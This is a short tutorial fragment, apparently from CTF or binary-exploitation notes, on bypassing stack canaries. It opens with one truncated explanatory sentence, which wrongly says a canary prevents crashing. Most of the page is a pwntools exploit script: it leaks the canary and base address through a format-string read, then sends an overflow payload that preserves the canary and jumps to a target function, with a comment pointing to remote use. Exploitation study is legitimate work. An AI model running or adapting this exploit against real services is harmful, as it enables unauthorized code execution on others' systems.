Exploitation
A canary helps to prevent buffer overflow attacks by detecting stack overflow and preventing the program from crashing. Canary Bypass is used to bypass the protection provided by the stack canary. Thi
from pwn import *
import re
context.update(arch="amd64", os="linux")
filepath = "./example"
elf = context.binary = ELF(filepath)
p = process(filepath) # p = remote('example.com', '1337') for remote connection
# We need to find the stack canary. This address ends with "00".
# To find it, execute p.sendline(b"%p %p %p %p ...").
p.sendline(b"%10$p %13$p")
p.recvuntil(b"result: ")
leaked = p.recvline().split()
print(leaked)
base = int(leaked[0], 16) - 0xa90
canary = int(leaked[1], 16)
elf.address = base
payload = b"A"*24
payload += p64(canary)
payload += b"B"*8
payload += p64(base + 0x6fe)
payload += p64(elf.sym["target_func"])
p.sendline(payload)
p.interactive()
Last updated